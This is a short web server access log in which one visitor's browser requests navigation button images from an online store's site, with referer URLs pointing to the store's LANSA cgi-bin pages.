220.247.11.218 - - [04/Sep/2009:05:00:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:55 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
